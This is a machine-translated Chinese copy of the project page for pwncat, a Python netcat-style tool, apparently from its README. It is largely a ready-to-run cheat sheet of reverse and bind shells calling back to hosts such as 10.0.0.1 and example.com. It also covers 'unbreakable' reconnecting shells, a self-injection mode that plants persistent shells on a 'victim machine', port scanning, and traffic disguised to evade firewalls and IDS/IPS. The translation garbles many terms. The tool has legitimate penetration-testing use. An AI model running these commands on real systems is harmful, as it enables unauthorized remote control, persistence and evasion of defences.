Netcat 具有防火墙、IDS/IPS 规避、绑定和反向 shell 以及端口转发魔术的类固醇 - 并且它完全可使用 Python (PSE) 编写脚本。
项目描述
文档| 安装| TL;博士| 特点| 行为| 用法| 示例| 常见问题| 贡献| 免责声明| 执照
<中心>
</中心>
pwncat
Netcat 具有防火墙、IDS/IPS 规避、绑定和反向 shell、自注入 shell 和端口转发魔术的类固醇 - 并且它完全可使用 Python ( PSE ) 编写脚本。- docs.pwncat.org
| 代码风格 | 集成测试<small>[2]</small> | |||||||||||||||||||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|
[1] mypy 类型覆盖率 (完全键入:94.00%)
[2]失败的构建并不表示功能损坏。集成测试运行了多个小时,并且由于各种不同的原因(网络超时、GitHub Actions 的未知取消等)偶尔中断:#735、#841
动机
曾经不小心在你的反向外壳上打了Ctrl+c并且它一去不复返了吗?曾经因为防火墙不让客户端连接而永远等待您的客户端连接到您吗?曾经因为 IPS 关闭可疑端口而导致连接丢失?曾经需要快速的端口转发吗?
这个让你得到了保障。
除此之外,当前的功能nc,ncat或者socat只是没有满足我的需求,我还希望有一个可以在旧机器和新机器上工作的单一工具(因此 Python 2+3 兼容)。最重要的是,我想用一种我可以理解并提供我自己的功能的语言来使用它。(等等,Linux、MacOS 和 Windows 的二进制版本很快就会发布)。
:closed_book: 文档
| Pwncat 文档 | 关联 |
|---|---|
| 官方文档 | https://docs.pwncat.org |
| 官方网站 | https://pwncat.org |
| API 文档 | https://pwncat.org/pwncat.api.html |
| Pwncat 脚本引擎 | PSE |
:tada: 安装
当前版本是:0.1.2
通用的
| 点 |
|---|
 |
pip install pwncat |
操作系统特定
| 苹果系统 | Arch Linux | 黑拱 | 中央操作系统[1] |
|---|---|---|---|
 |
 |
 |
 |
brew install pwncat |
yay -S pwncat |
pacman -S pwncat |
yum install pwncat |
| 软呢帽 | 卡利 Linux | 尼克斯操作系统[2] | 甲骨文 Linux [1] |
 |
 |
 |
 |
dnf install pwncat |
apt install pwncat |
nixos.pwncat |
yum install pwncat |
| 奔图 | 鹦鹉操作系统 | ||
 |
 |
||
net-analyzer/pwncat |
apt install pwncat |
[1]:Epel 存储库
[2]:不稳定
:咖啡: TL;DR
这只是一个快速入门概述。有关更高级的技术,请参见:computer: Usage或:bulb: Examples。
看实际
牢不可破的反向壳 - 如何产卵
|
牢不可破的反向外壳 - 多个外壳
|
部署到目标
# Copy base64 data to clipboard from where you have internet access
curl https://raw.githubusercontent.com/cytopia/pwncat/master/bin/pwncat | base64
# Paste it on the target machine
echo "<BASE64 STRING>" | base64 -d > pwncat
chmod +x pwncat
注入目标
# [1] If you found a vulnerability on the target to start a very simple reverse shell,
# such as via bash, php, perl, python, nc or similar, you can instruct your local
# pwncat listener to use this connection to deploy itself on the target automatically
# and start an additional unbreakable reverse shell back to you.
pwncat -l 4444 --self-inject /bin/bash:10.0.0.1:4445
召唤贝壳
# Bind shell (accepts new clients after disconnect)
pwncat -l -e '/bin/bash' 8080 -k
# Reverse shell (Ctrl+c proof: reconnects back to you)
pwncat -e '/bin/bash' example.com 4444 --reconn --recon-wait 1
# Reverse UDP shell (Ctrl+c proof: reconnects back to you)
pwncat -e '/bin/bash' example.com 4444 -u --ping-intvl 1
端口扫描
# [TCP] IPv4 + IPv6
pwncat -z 10.0.0.1 80,443,8080
pwncat -z 10.0.0.1 1-65535
pwncat -z 10.0.0.1 1+1023
# [UDP] IPv4 + IPv6
pwncat -z 10.0.0.1 80,443,8080 -u
pwncat -z 10.0.0.1 1-65535 -u
pwncat -z 10.0.0.1 1+1023 -u
# Use only IPv6 or IPv4
pwncat -z 10.0.0.1 1-65535 -4
pwncat -z 10.0.0.1 1-65535 -6 -u
# Add version detection
pwncat -z 10.0.0.1 1-65535 --banner
本地端口转发-L(监听代理)
# Make remote MySQL server (remote port 3306) available on current machine
# on every interface on port 5000
pwncat -L 0.0.0.0:5000 everythingcli.org 3306
# Same, but convert traffic on your end to UDP
pwncat -L 0.0.0.0:5000 everythingcli.org 3306 -u
远程端口转发-R(双客户端代理)
# Connect to Remote MySQL server (remote port 3306) and then connect to another
# pwncat/netcat server on 10.0.0.1:4444 and bridge traffic
pwncat -R 10.0.0.1:4444 everythingcli.org 3306
# Same, but convert traffic on your end to UDP
pwncat -R 10.0.0.1:4444 everythingcli.org 3306 -u
:star: 特点
乍看上去
pwncat有很多特点,下面只是一个突出特点的列表。
| 特征 | 描述 |
|---|---|
| PSE | 完全可使用 Pwncat 脚本引擎编写脚本,以允许发送和接收各种花哨的东西 |
| 端口扫描 | 支持基本版本检测的 TCP 和 UDP 端口扫描 |
| 自注入 rshell | 自注入模式自动部署并启动一个牢不可破的反向外壳自动返回给您 |
| 绑定外壳 | 创建绑定外壳 |
| 反壳 | 创建反向壳 |
| 端口转发 | 本地和远程端口转发(代理服务器/客户端) |
| Ctrl+c | 如果您不小心点击Ctrl+ ,反向外壳可以重新连接c |
| 检测出口 | 扫描并报告目标上打开的出口端口(端口跳跃) |
| 躲避固件 | 通过循环输出端口(端口跳跃)避开出口防火墙 |
| 躲避 IPS | 通过在连接中断(端口跳跃)时循环输出端口来规避入侵防御系统 |
| UDP 转壳 | 试试这个和传统的netcat |
| 有状态的 UDP | UDP 客户端模式的有状态连接阶段 |
| TCP/UDP | 完整的 TCP 和 UDP 支持 |
| IPv4 / IPv6 | 双或单栈 IPv4 和 IPv6 支持 |
| 蟒蛇2+3 | 适用于 Python 2、Python 3、pypy2 和 pypy3 |
| 跨操作系统 | 只要 Python 可用,就可以在 Linux、MacOS 和 Windows 上工作 |
| 兼容性 | 将netcat,ncat或socat用作客户端或服务器pwncat |
| 便携的 | 仅使用核心包的单个文件 - 不需要外部依赖项。 |
特征比较矩阵
| pwncat | 网猫 | 猫 | 索卡特 | |
|---|---|---|---|---|
| 脚本引擎 | ✔ 蟒蛇 | :X: | ✔ 卢阿 | :X: |
| IP服务条款 | ✔ | ✔ | :X: | ✔ |
| IPv4 | ✔ | ✔ | ✔ | ✔ |
| IPv6 | ✔ | ✔ | ✔ | ✔ |
| Unix 域套接字 | :X: | ✔ | ✔ | ✔ |
| Linux vsock | :X: | :X: | ✔ | :X: |
| 套接字源绑定 | ✔ | ✔ | ✔ | ✔ |
| TCP | ✔ | ✔ | ✔ | ✔ |
| UDP | ✔ | ✔ | ✔ | ✔ |
| SCTP | :X: | :X: | ✔ | ✔ |
| SSL | :X: | :X: | ✔ | ✔ |
| HTTP | ✔ | :X: | :X: | :X: |
| HTTPS | * | :X: | :X: | :X: |
| Telnet 协商 | :X: | ✔ | ✔ | :X: |
| 代理支持 | :X: | ✔ | ✔ | ✔ |
| 本地端口转发 | ✔ | :X: | :X: | ✔ |
| 远程端口转发 | ✔ | :X: | :X: | :X: |
| 入站端口扫描 | ✔ | ✔ | ✔ | :X: |
| 出站端口扫描 | ✔ | :X: | :X: | :X: |
| 版本检测 | ✔ | :X: | :X: | :X: |
| 聊天 | ✔ | ✔ | ✔ | ✔ |
| 命令执行 | ✔ | ✔ | ✔ | ✔ |
| 十六进制转储 | * | ✔ | ✔ | ✔ |
| 经纪人 | :X: | :X: | ✔ | :X: |
| 同时连接 | :X: | :X: | ✔ | ✔ |
| 允许否认 | :X: | :X: | ✔ | ✔ |
| 重新接受 | ✔ | ✔ | ✔ | ✔ |
| 自注射 | ✔ | :X: | :X: | :X: |
| UDP反向外壳 | ✔ | :X: | :X: | :X: |
| 重生客户端 | ✔ | :X: | :X: | :X: |
| 跳港 | ✔ | :X: | :X: | :X: |
| 紧急停机 | ✔ | :X: | :X: | :X: |
*功能目前正在开发中。
:cop: 行为
与最初的实现一样netcat,使用TCP时,pwncat
(在客户端和侦听模式下)如果网络连接已正确或不正确地终止,将自动退出。如果远程对等方未终止连接,或处于UDP模式,netcat则将pwncat保持打开状态。当 STDIN 关闭时,行为会有所不同。
netcat:如果 STDIN 已关闭,但连接保持打开状态,netcat则将保持打开状态pwncat:如果 STDIN 已关闭,但连接保持打开状态,pwncat则将关闭
您可以使用命令行参数模拟netcat行为。--no-shutdown
查看以下命令以更好地理解此行为:
# [Valid HTTP request] Quits, web server keeps connection intact, but STDIN is EOF
printf "GET / HTTP/1.1\n\n" | pwncat www.google.com 80
# [Valid HTTP request] Does not quit, web server keeps connection intact, but STDIN is EOF
printf "GET / HTTP/1.1\n\n" | pwncat www.google.com 80 --no-shutdown
# [Invalid HTTP request] Quits, because the web server closes the connection and STDIN is EOF
printf "GET / \n\n" | pwncat www.google.com 80
# [TCP]
# Both instances will quit after successful file transfer.
pwncat -l 4444 > output.txt
pwncat localhost 4444 < input.txt
# [TCP]
# Neither of both, client and server will quit after successful transfer
# and they will be stuck, waiting for more input or output.
# When exiting one (e.g.: via Ctrl+c), the other one will quit as well.
pwncat -l 4444 --no-shutdown > output.txt
pwncat localhost 4444 --no-shutdown < input.txt
请注意,通过 UDP 发送文件是不可靠的
# [UDP] (--no-shutdown has no effect, as this is the default behaviour in UDP)
# Neither of both, client and server will quit after successful transfer
# and they will be stuck, waiting for more input or output.
# When exiting one (e.g.: via Ctrl+c), the other one will still stay open in UDP mode.
pwncat -u -l 4444 > output.txt
pwncat -u localhost 4444 < input.txt
有很多方法可以改变这种默认行为。查看使用 部分以获得更高级的设置。
:计算机:用法
钥匙
| 行为 |  |
|
 |
|---|---|---|---|
| 退出(信号情报) | Ctrl+c | Ctrl+c | Ctrl+c |
| 退出(SIGQUIT) | Ctrl+\ | ? | ? |
| 退出(SIGQUIT) | Ctrl+4 | ? | ? |
| 退出标准输入[1] | Ctrl+d | Ctrl+d | Ctrl+z和Ctrl+Enter |
| 发送(荷兰) | Ctrl+j | ? | ? |
| 发送 (EOL) | Ctrl+m | ? | ? |
| 发送 (EOL) | Enter | Enter | Enter |
[1] 仅在不使用
--no-shutdownand时有效--keep。然后将关闭它的套接字以进行发送,在其套接字上向远程端和 EOF 发出信号。
命令行参数
在下方键入pwncat -h或单击以查看所有可用选项。
点击这里扩大使用
usage: pwncat [options] hostname port
pwncat [options] -l [hostname] port
pwncat [options] -z hostname port
pwncat [options] -L [addr:]port hostname port
pwncat [options] -R addr:port hostname port
pwncat -V, --version
pwncat -h, --help
Enhanced and comptaible Netcat implementation written in Python (2 and 3) with
connect, zero-i/o, listen and forward modes and techniques to detect and evade
firewalls and intrusion detection/prevention systems.
If no mode arguments are specified, pwncat will run in connect mode and act as
a client to connect to a remote endpoint. If the connection to the remote
endoint is lost, pwncat will quit. See options for how to automatically re-
connect.
positional arguments:
hostname Address to listen, forward, scan or connect to.
port [All modes]
Single port to listen, forward or connect to.
[Zero-I/O mode]
Specify multiple ports to scan:
Via list: 4444,4445,4446
Via range: 4444-4446
Via incr: 4444+2
mode arguments:
-l, --listen [Listen mode]:
Start a server and listen for incoming connections.
If using TCP and a connected client disconnects or the
connection is interrupted otherwise, the server will
quit. See -k/--keep-open to change this behaviour.
-z, --zero [Zero-I/0 mode]:
Connect to a remote endpoint and report status only.
Used for port scanning.
See --banner for version detection.
-L [addr:]port, --local [addr:]port
[Local forward mode]:
This mode will start a server and a client internally.
The internal server will listen locally on specified
addr/port (given by --local [addr:]port).
The server will then forward traffic to the internal
client which connects to another server specified by
hostname/port given via positional arguments.
(I.e.: proxies a remote service to a local address)
-R addr:port, --remote addr:port
[Remote forward mode]:
This mode will start two clients internally. One is
connecting to the target and one is connecting to
another pwncat/netcat server you have started some-
where. Once connected, it will then proxy traffic
between you and the target.
This mode should be applied on machines that block
incoming traffic and only allow outbound.
The connection to your listening server is given by
-R/--remote addr:port and the connection to the
target machine via the positional arguments.
optional arguments:
-e cmd, --exec cmd Execute shell command. Only for connect or listen mode.
-C lf, --crlf lf Specify, 'lf', 'crlf' or 'cr' to always force replacing
line endings for input and outout accordingly. Specify
'no' to completely remove any line feeds. By default
it will not replace anything and takes what is entered
(usually CRLF on Windows, LF on Linux and some times
CR on MacOS).
-n, --nodns Do not resolve DNS.
--send-on-eof Buffer data received on stdin until EOF and send
everything in one chunk.
--no-shutdown Do not shutdown into half-duplex mode.
If this option is passed, pwncat won't invoke shutdown
on a socket after seeing EOF on stdin. This is provided
for backward-compatibility with OpenBSD netcat, which
exhibits this behavior.
-v, --verbose Be verbose and print info to stderr. Use -v, -vv, -vvv
or -vvvv for more verbosity. The server performance will
decrease drastically if you use more than three times.
--info type Show additional info about sockets, IPv4/6 or TCP opts
applied to the current socket connection. Valid
parameter are 'sock', 'ipv4', 'ipv6', 'tcp' or 'all'.
Note, you must at least be in INFO verbose mode in order
to see them (-vv).
-c str, --color str Colored log output. Specify 'always', 'never' or 'auto'.
In 'auto' mode, color is displayed as long as the output
goes to a terminal. If it is piped into a file, color
will automatically be disabled. This mode also disables
color on Windows by default. (default: auto)
--safe-word str All modes:
If pwncat is started with this argument, it will shut
down as soon as it receives the specified string. The
--keep-open (server) or --reconn (client) options will
be ignored and it won't listen again or reconnect to you.
Use a very unique string to not have it shut down
accidentally by other input.
protocol arguments:
-4 Only Use IPv4 (default: IPv4 and IPv6 dualstack).
-6 Only Use IPv6 (default: IPv4 and IPv6 dualstack).
-u, --udp Use UDP for the connection instead of TCP.
-T str, --tos str Specifies IP Type of Service (ToS) for the connection.
Valid values are the tokens 'mincost', 'lowcost',
'reliability', 'throughput' or 'lowdelay'.
--http Connect / Listen mode (TCP and UDP):
Hide traffic in http packets to fool Firewalls/IDS/IPS.
--https Connect / Listen mode (TCP and UDP):
Hide traffic in https packets to fool Firewalls/IDS/IPS.
-H [str [str ...]], --header [str [str ...]]
Add HTTP headers to your request when using --http(s).
command & control arguments:
--self-inject cmd:host:port[s]
Listen mode (TCP only):
If you are about to inject a reverse shell onto the
victim machine (via php, bash, nc, ncat or similar),
start your listening server with this argument.
This will then (as soon as the reverse shell connects)
automatically deploy and background-run an unbreakable
pwncat reverse shell onto the victim machine which then
also connects back to you with specified arguments.
Example: '--self-inject /bin/bash:10.0.0.1:4444'
It is also possible to launch multiple reverse shells by
specifying multiple ports.
Via list: --self-inject /bin/sh:10.0.0.1:4444,4445,4446
Via range: --self-inject /bin/sh:10.0.0.1:4444-4446
Via incr: --self-inject /bin/sh:10.0.0.1:4444+2
Note: this is currently an experimental feature and does
not work on Windows remote hosts yet.
pwncat scripting engine:
--script-send file All modes (TCP and UDP):
A Python scripting engine to define your own custom
transformer function which will be executed before
sending data to a remote endpoint. Your file must
contain the exact following function which will:
be applied as the transformer:
def transform(data, pse):
# NOTE: the function name must be 'transform'
# NOTE: the function param name must be 'data'
# NOTE: indentation must be 4 spaces
# ... your transformations goes here
return data
You can also define as many custom functions or classes
within this file, but ensure to prefix them uniquely to
not collide with pwncat's function or classes, as the
file will be called with exec().
--script-recv file All modes (TCP and UDP):
A Python scripting engine to define your own custom
transformer function which will be executed after
receiving data from a remote endpoint. Your file must
contain the exact following function which will:
be applied as the transformer:
def transform(data, pse):
# NOTE: the function name must be 'transform'
# NOTE: the function param name must be 'data'
# NOTE: indentation must be 4 spaces
# ... your transformations goes here
return data
You can also define as many custom functions or classes
within this file, but ensure to prefix them uniquely to
not collide with pwncat's function or classes, as the
file will be called with exec().
zero-i/o mode arguments:
--banner Zero-I/O (TCP and UDP):
Try banner grabbing during port scan.
listen mode arguments:
-k, --keep-open Listen mode (TCP only):
Re-accept new clients in listen mode after a client has
disconnected or the connection is interrupted otherwise.
(default: server will quit after connection is gone)
--rebind [x] Listen mode (TCP and UDP):
If the server is unable to bind, it will re-initialize
itself x many times before giving up. Omit the
quantifier to rebind endlessly or specify a positive
integer for how many times to rebind before giving up.
See --rebind-robin for an interesting use-case.
(default: fail after first unsuccessful try).
--rebind-wait s Listen mode (TCP and UDP):
Wait x seconds between re-initialization. (default: 1)
--rebind-robin port Listen mode (TCP and UDP):
If the server is unable to initialize (e.g: cannot bind
and --rebind is specified, it it will shuffle ports in
round-robin mode to bind to.
Use comma separated string such as '80,81,82,83', a range
of ports '80-83' or an increment '80+3'.
Set --rebind to at least the number of ports to probe +1
This option requires --rebind to be specified.
connect mode arguments:
--source-addr addr Specify source bind IP address for connect mode.
--source-port port Specify source bind port for connect mode.
--reconn [x] Connect mode (TCP and UDP):
If the remote server is not reachable or the connection
is interrupted, the client will connect again x many
times before giving up. Omit the quantifier to retry
endlessly or specify a positive integer for how many
times to retry before giving up.
(default: quit if the remote is not available or the
connection was interrupted)
This might be handy for stable TCP reverse shells ;-)
Note on UDP:
By default UDP does not know if it is connected, so
it will stop at the first port and assume it has a
connection. Consider using --udp-sconnect with this
option to make UDP aware of a successful connection.
--reconn-wait s Connect mode (TCP and UDP):
Wait x seconds between re-connects. (default: 1)
--reconn-robin port Connect mode (TCP and UDP):
If the remote server is not reachable or the connection
is interrupted and --reconn is specified, the client
will shuffle ports in round-robin mode to connect to.
Use comma separated string such as '80,81,82,83', a range
of ports '80-83' or an increment '80+3'.
Set --reconn to at least the number of ports to probe +1
This helps reverse shell to evade intrusiona prevention
systems that will cut your connection and block the
outbound port.
This is also useful in Connect or Zero-I/O mode to
figure out what outbound ports are allowed.
--ping-init Connect mode (TCP and UDP):
UDP is a stateless protocol unlike TCP, so no hand-
shake communication takes place and the client just
sends data to a server without being "accepted" by
the server first.
This means a server waiting for an UDP client to
connect to, is unable to send any data to the client,
before the client hasn't send data first. The server
simply doesn't know the IP address before an initial
connect.
The --ping-init option instructs the client to send one
single initial ping packet to the server, so that it is
able to talk to the client.
This is a way to make a UDP reverse shell work.
See --ping-word for what char/string to send as initial
ping packet (default: '\0')
--ping-intvl s Connect mode (TCP and UDP):
Instruct the client to send ping intervalls every s sec.
This allows you to restart your UDP server and just wait
for the client to report back in. This might be handy
for stable UDP reverse shells ;-)
See --ping-word for what char/string to send as initial
ping packet (default: '\0')
--ping-word str Connect mode (TCP and UDP):
Change the default character '\0' to use for upd ping.
Single character or strings are supported.
--ping-robin port Connect mode (TCP and UDP):
Instruct the client to shuffle the specified ports in
round-robin mode for a remote server to ping.
This might be handy to scan outbound allowed ports.
Use comma separated string such as '80,81,82,83', a range
of ports '80-83' or an increment '80+3'.
Use --ping-intvl 0 to be faster.
--udp-sconnect Connect mode (UDP only):
Emulating stateful behaviour for UDP connect phase by
sending an initial packet to the server to validate if
it is actually connected.
By default, UDP will simply issue a connect and is not
aware if it is really connected or not.
The default connect packet to be send is '\0', you
can change this with --udp-sconnect-word.
--udp-sconnect-word [str]
Connect mode (UDP only):
Change the the data to be send for UDP stateful connect
behaviour. Note you can also omit the string to send an
empty packet (EOF), but be aware that some servers such
as netcat will instantly quit upon receive of an EOF
packet.
The default is to send a null byte sting: '\0'.
misc arguments:
-h, --help Show this help message and exit
-V, --version Show version information and exit
:bulb: 例子
将你的 shell 升级为交互式
这是一个通用建议,不仅适用于
pwncat,而且适用于所有其他常用工具。
当与反向或绑定 shell 连接时,您会注意到没有交互式命令将起作用,并且点击Ctrl+c将终止您的会话。要解决此问题,您需要将其附加到 TTY(使其具有交互性)。就是这样:
python3 -c 'import pty; pty.spawn("/bin/bash")'
Ctrl+z
# get your current terminal size (rows and columns)
stty size
# for bash/sh (enter raw mode and disable echo'ing)
stty raw -echo
fg
# for zsh (enter raw mode and disable echo'ing)
stty raw -echo; fg
reset
export SHELL=bash
export TERM=xterm
stty rows <num> columns <cols> # <num> and <cols> values found above by 'stty size'
[1]反壳备忘单
UDP反向外壳
如果没有技巧,UDP 反向 shell 是不可能的。与 TCP 相比,UDP 是一种无状态协议,没有connect()TCP 那样的方法。在 TCP 模式下,一旦客户端发出connects(). 在 UDP 模式下,由于没有connect(),客户端只需将数据发送到地址/端口,而无需先连接。因此,在 UDP 模式下,服务器将无法知道客户端的 IP 和端口,因此无法先向其发送数据。使这成为可能的唯一方法是让客户端首先向服务器发送某种数据,以便服务器可以看到哪个 IP/端口向它发送了数据。
pwncatconnect()通过让客户端一次或定期通过--ping-intvlor向服务器发送一个空字节来模拟 TCP --ping-init。
# The client
# --exec # Provide this executable
# --udp # Use UDP mode
# --ping-init # Send an initial null byte to the server
pwncat --exec /bin/bash --udp --ping-init 10.0.0.1 4444
牢不可破的 TCP 反向外壳
为什么坚不可摧?因为它会不断地回到你身边,即使你暂时杀死你的监听服务器。换句话说,客户端会一直尝试连接到指定的服务器,直到成功。如果连接中断,它将继续重试。
# The client
# --exec # Provide this executable
# --nodns # Keep the noise down and don't resolve hostnames
# -reconn # Automatically reconnect back to you indefinitely
# --reconn-wait # If connection is lost, connect back to you every 2 seconds
pwncat --exec /bin/bash --nodns --reconn --reconn-wait 2 10.0.0.1 4444
牢不可破的 UDP 反向外壳
为什么坚不可摧?因为它会不断地回到你身边,即使你暂时杀死你的监听服务器。换句话说,客户端将不断向服务器发送空字节以不断地宣布自己。
# The client
# --exec # Provide this executable
# --nodns # Keep the noise down and don't resolve hostnames
# --udp # Use UDP mode
# --ping-intvl # Ping the server every 2 seconds
pwncat --exec /bin/bash --nodns --udp --ping-intvl 2 10.0.0.1 4444
自注反壳
假设您能够创建一个从目标到您的机器的非常简单且不稳定的反向 shell,例如通过 PHP 脚本或类似脚本的 Web shell。知道这不会持续很长时间或可能由于不稳定的网络连接而中断,您可以使用pwncat挂钩到此连接并在目标上牢不可破地部署自己 - 完全自动化。
您所要做的就是pwncat用作本地侦听器并使用--self-inject
开关启动它。一旦客户端(例如:反向 web shell)连接到它,它将做几件事:
- 枚举目标上的 Python 可用性和版本
- 将自身 base64 编码转储到目标上
- 使用目标的 Python 自行解码。
- 使用目标的 Python 将自己作为一个牢不可破的反向 shell 回到你身边
完成此操作后,您可以继续使用当前连接,或者干脆放弃它并启动一个新的侦听器(是的,您不需要在启动反向 shell 之前启动侦听器)以让新pwncat客户端连接到您。新的监听器也不必是pwncat,也可以是netcator ncat。
--self-inject开关:
pwncat -l 4444 --self-inject <cmd>:<host>:<port>
<cmd>: 这是在目标上启动的命令(比如-e/--exec,所以你希望它是cmd.exeor/bin/bash)<host>:这是针对您的本地计算机的,反向外壳应连接回的 IP 地址<port>:这是针对您的本地计算机的,反向外壳应连接回的端口
所以想象你的 Kali 机器是 10.0.0.1。您指示